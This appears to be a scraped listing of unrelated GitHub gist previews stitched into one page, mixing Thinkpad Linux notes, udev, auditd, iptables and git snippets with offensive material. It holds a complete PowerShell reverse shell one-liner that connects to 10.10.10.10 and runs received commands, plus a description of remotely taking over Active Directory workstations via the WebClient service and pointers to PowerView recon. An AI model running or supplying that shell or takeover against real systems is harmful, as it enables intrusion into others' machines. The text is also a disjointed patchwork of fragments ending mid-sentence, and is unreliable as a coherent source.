Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)
These are my installation-tricks and notes for running Linux on a 2021 Thinkpad
P14s Gen2 with AMD Ryzen 7 5850U. It should also be suitable for the Thinkpad T14 Gen2 AMD as they are technically the same modell.
Meanwhile there is also a good test on youtube and an entry in the arch-wiki, which also comments some points mentioned here.
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
| #!/bin/bash | |
| # SPDX-License-Identifier: MIT License | |
| # Steps: | |
| # 1) Make sure bash is available | |
| # 2) Create udev rule | |
| # - path to new udev rule: /etc/udev/rules.d/50-x-resize.rules | |
| # - udev rule content: | |
| # ACTION=="change",KERNEL=="card0", SUBSYSTEM=="drm", RUN+="/usr/local/bin/x-resize" | |
| # 3) Create /var/log/autores directory | |
| # 4) Create script /usr/local/bin/x-resize (this file) and make executable |
AddOn:
chrome/userChrome.css in your profile directory:
| # Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html | |
| $client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() |
| # IMPORTANT! | |
| # This gist has been transformed into a github repo | |
| # You can find the most recent version there: | |
| # https://github.com/Neo23x0/auditd | |
| # ___ ___ __ __ | |
| # / | __ ______/ (_) /_____/ / | |
| # / /| |/ / / / __ / / __/ __ / | |
| # / ___ / /_/ / /_/ / / /_/ /_/ / | |
| # /_/ |_\__,_/\__,_/_/\__/\__,_/ |
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
| #!/bin/bash | |
| # Flushing all rules | |
| iptables -F FORWARD | |
| iptables -F INPUT | |
| iptables -F OUTPUT | |
| iptables -X | |
| # Setting default filter policy | |
| iptables -P INPUT DROP | |
| iptables -P OUTPUT DROP | |
| iptables -P FORWARD DROP |
If a project has to have multiple git repos (e.g. Bitbucket and Github) then it's better that they remain in sync.
Usually this would involve pushing each branch to each repo in turn, but actually Git allows pushing to multiple repos in one go.
If in doubt about what git is doing when you run these commands, just